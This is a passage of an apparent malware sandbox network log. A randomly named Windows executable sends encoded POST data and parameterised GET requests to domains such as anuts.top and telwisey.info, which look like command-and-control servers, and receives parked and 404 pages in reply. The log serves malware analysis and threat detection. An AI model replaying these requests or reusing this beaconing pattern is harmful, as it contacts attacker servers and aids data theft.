6e 75 5a 49 6b [TRUNCATED] Data Ascii: kbRxoVY0=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNv6lW9sRjNIOsgGK1R2R92VTf0xEDzhSd2cFyreor8Nb7yPmem3/g9kRZ686OYdNBwZmyj5x3Q+yw0QnmfdpFAuFpXB2EQ1xbYr1fY+EkEFf3QTXipK5ik/RtJIfXS+vdS2Rkudgo0lnjklgzC2n2IK0Z2FbnuZIkhww/nkWim2hmqaT2OphONFeQMYrNBQ1VrkZqo5Fe+PIblPuXmZOwytYQ6Uzw2YGRa/rzQ+dYkLieKKzvIDTPNaHI4sLbLzerzUNaC0/MVLZT37ySpk5CXopLFmdJfVhRcwa4qnf3Z6XHe1RCxMgt+O2tzA/SU7bYvVWcJwysssdO9TPcuF+murPDQHN0WpQdiiJjNew1/U7+BqVoEXIhYW83o/ZXFh9UcKO3+MYz+199jGUI+2blszQQQqrHxvao5WCZNsaGcqOAYVbgQWlTOpTAtp5yMbe29opIqDFrLL0sQLelAjXBT2Cy7EQP2ELzdMPouQkwvUufwxyOTtHhqfqp9MFXVTJc7N0c2123UN7gN8ZctWHe1nIqZN6OTm6yw9UDiknTs8Edr/Zp69waFmdsZIKYSvqNY60QLu4zOXeD9eCtTRa/2DrQ9DBilsmrNaF5rf/0jUcFYokV5aQtfoAX1ROpqBSCH4d3SemCk3f/HHb77DqCufk35+CnN0K/7B4t8cTKAlFTUlFarlhLHYXKb/jWluD/IzP++JQL1qnziFXnhG1jiYS8pRwSEcmF/R4A5IMYKSCSwFXEjRN6uHopYIaXiopH1GgvaF0kx8a5D2ypsRvcFtUvBAAlv62+6uXWdW0eHXhBVRyuISs0NkBNwQ37x5v0LL [TRUNCATED]
Aug 29, 2024 05:24:56.557802916 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 29 Aug 2024 03:24:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 29, 2024 05:24:56.557822943 CEST	224	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
Aug 29, 2024 05:24:56.557842016 CEST	1236	IN	Data Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
Aug 29, 2024 05:24:56.557853937 CEST	1236	IN	Data Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
Aug 29, 2024 05:24:56.557866096 CEST	1236	IN	Data Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20 Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
Aug 29, 2024 05:24:56.557878017 CEST	654	IN	Data Raw: 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 20 77 65 62 20 68 6f 73 74 69 6e 67 Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	194.9.94.85	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:58.431737900 CEST	510	OUT	GET /4hda/?kbRxoVY0=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&DnUL=_290s HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.xn--matfrmn-jxa4m.se Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 29, 2024 05:24:59.075531960 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 29 Aug 2024 03:24:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 29, 2024 05:24:59.075550079 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 29, 2024 05:24:59.075562000 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 29, 2024 05:24:59.075575113 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 29, 2024 05:24:59.075588942 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	23.251.54.212	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:04.539912939 CEST	763	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 205 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 70 6e 2f 79 52 51 68 59 6a 4a 62 56 56 49 73 68 33 32 4a 64 46 4f 30 53 53 6d 4e 55 33 75 52 57 53 6e 37 78 33 42 46 69 48 55 6a 50 69 38 6c 34 43 4b 6d 75 66 75 43 70 6b 77 63 2b 67 37 6f 2b 46 65 61 43 76 6f 35 65 76 79 6e 69 55 72 38 54 4d 6a 4a 78 75 42 41 46 70 53 35 45 61 45 56 68 35 7a 43 69 47 38 43 70 46 4b 4c 75 77 54 58 69 36 6b 6c 79 32 4a 4a 4e 33 41 73 53 42 37 67 65 73 31 75 74 70 77 31 35 6b 39 55 47 55 73 35 54 35 59 39 6c 33 38 4e 56 59 46 37 36 7a 48 74 43 32 4e 56 42 6d 44 45 34 6b 37 54 45 67 59 4a 75 4e 77 4d 45 48 51 3d 3d Data Ascii: kbRxoVY0=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l38NVYF76zHtC2NVBmDE4k7TEgYJuNwMEHQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	23.251.54.212	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:07.082343102 CEST	783	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 225 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 42 57 53 47 4c 78 32 44 74 69 41 55 6a 50 73 63 6b 79 63 36 6d 70 66 75 47 68 6b 31 6b 2b 67 37 38 2b 46 61 57 43 76 37 68 52 75 69 6e 67 4d 62 38 64 49 6a 4a 78 75 42 41 46 70 53 38 5a 61 41 78 68 34 44 53 69 46 59 32 75 62 36 4c 70 6d 6a 58 69 70 30 6c 32 32 4a 4a 2f 33 46 49 30 42 39 6b 65 73 77 4b 74 71 68 31 36 2f 4e 55 4d 4b 63 34 6e 33 4c 49 31 31 4e 34 4a 57 32 50 35 31 6e 63 6e 36 72 45 62 33 79 6c 76 32 37 33 33 39 66 41 61 41 7a 78 4e 63 57 73 66 66 4b 42 45 6e 70 58 4e 38 42 67 2b 58 39 66 65 52 6f 4d 3d Data Ascii: kbRxoVY0=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27339fAaAzxNcWsffKBEnpXN8Bg+X9feRoM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	23.251.54.212	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:09.973195076 CEST	10865	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10305 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 4a 57 54 30 7a 78 32 6b 5a 69 42 55 6a 50 79 4d 6b 78 63 36 6d 30 66 71 69 6c 6b 31 35 46 67 35 45 2b 45 35 65 43 36 2b 4e 52 67 69 6e 67 51 72 38 51 4d 6a 49 72 75 42 52 43 70 54 4d 5a 61 41 78 68 34 42 61 69 52 38 43 75 5a 36 4c 75 77 54 58 75 36 6b 6c 65 32 4a 52 46 33 46 4d 43 43 4e 45 65 76 51 61 74 6d 33 5a 36 7a 4e 55 4b 4c 63 34 2f 33 4c 56 76 31 4e 6b 46 57 32 4b 63 31 6b 41 6e 35 38 46 54 6a 41 78 75 71 34 50 65 75 4e 34 62 4d 42 70 67 58 55 4a 67 58 62 68 38 38 72 58 6e 38 68 4e 4d 4e 65 72 41 4e 74 46 36 50 68 6e 36 66 6f 53 68 53 6a 65 79 70 4f 35 39 72 30 35 52 39 64 46 6c 75 37 47 76 67 4e 45 49 66 54 45 35 50 6d 42 33 74 6a 2b 49 57 78 6f 74 52 75 35 42 6d 49 71 68 6b 4e 72 46 77 2b 70 79 61 4a 61 47 6b 32 38 6a 4a 42 78 6f 2b 53 35 7a 6c 6d 52 78 6e 58 32 30 77 7a 58 63 61 56 78 59 70 45 48 33 4c 6d 69 49 68 36 63 66 6a 78 63 67 76 [TRUNCATED] Data Ascii: kbRxoVY0=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YJWT0zx2kZiBUjPyMkxc6m0fqilk15Fg5E+E5eC6+NRgingQr8QMjIruBRCpTMZaAxh4BaiR8CuZ6LuwTXu6kle2JRF3FMCCNEevQatm3Z6zNUKLc4/3LVv1NkFW2Kc1kAn58FTjAxuq4PeuN4bMBpgXUJgXbh88rXn8hNMNerANtF6Phn6foShSjeypO59r05R9dFlu7GvgNEIfTE5PmB3tj+IWxotRu5BmIqhkNrFw+pyaJaGk28jJBxo+S5zlmRxnX20wzXcaVxYpEH3LmiIh6cfjxcgvnwCRFSUk+54ZwXMq2uVfWg45fy3AGQzdV0Np8TVLwPRY+/xdMHOnXEhv4iPmemX/cOS94WU0d5qD9i2AgKZpGX3/iXT2LKbDQeBHqjcbvsf+3uO3lEe9uh4Ic1bpTELlpQIIkNOadANHvb2C0G47hpS289mPWEhU7agJWFP1Kjltroa6VdCUJXYi6RC8YAjamqKG1ttCF866n89Nmtq2ZqOPRKfrd2pc43BKWWf72kNi4RViUj1q1SPEjdVm1Tkyr4Pan9tieLsBpAAXZ6Vvb5sZC+bzduLc39lWejU3hpNfJUflhfJ9Xq2YfXc9K7daT1HyNKaI4/lCZZpBzAPxt17F6LMfSFJ9zlL13wXv9AAr2wEAzVXuP/h+S6x9x0umTug7oSrXBy1AB/jhwv504FVZRVAmxjbmiq7Bsq4IeezFzTvYJc6VdOD271QYJRHBOkstDKbE6JIo8zAUTUl7oPkBMVEyJV9n9oKjAKRPffXfF64OV5uQZQFlpvDA+SK0q+oyZo2uZjaKtuVhNz3NKtMTJUQ5ulyjMEt7leYc0i4cvfds3Qzvqd0bB+iVWlRBjZ91MOqiOzRhPrRRrZPs9Zy+QIeQEM7PWKnC3fqHQ7ryMGqy9dfROe88xB4BSGqQQ+7qgDFbWpWM9wS/mi41cuCi27sKlzLY1E [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	23.251.54.212	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:12.512154102 CEST	499	OUT	GET /li0t/?DnUL=_290s&kbRxoVY0=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.anuts.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	199.192.19.19	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:38.939413071 CEST	775	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 205 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 4b 4a 50 4e 6e 70 4d 64 5a 63 2b 53 48 41 38 54 45 72 72 46 6e 6d 79 64 61 4d 4e 77 72 6f 4d 4a 30 4b 2f 2f 36 51 55 79 54 33 56 46 59 45 69 4b 63 4a 78 32 43 45 2b 6e 30 63 74 73 37 4c 35 70 61 57 32 77 48 76 52 50 6d 53 70 32 43 67 7a 67 76 42 54 6e 6a 31 38 74 4d 6b 6c 48 59 68 64 31 6f 45 47 4d 50 2b 6c 75 74 47 36 4d 49 38 52 47 68 59 42 53 4f 4b 4c 4b 33 51 37 36 66 73 62 35 4d 43 66 57 6e 56 74 6b 33 59 31 79 78 52 58 6c 39 2b 4a 33 34 4e 4b 57 2f 30 38 51 37 61 6f 75 35 49 44 46 77 49 77 30 57 2f 34 6a 44 6e 74 36 38 6d 2f 74 69 41 3d 3d Data Ascii: kbRxoVY0=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34NKW/08Q7aou5IDFwIw0W/4jDnt68m/tiA==
Aug 29, 2024 05:25:39.547048092 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:25:39 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" 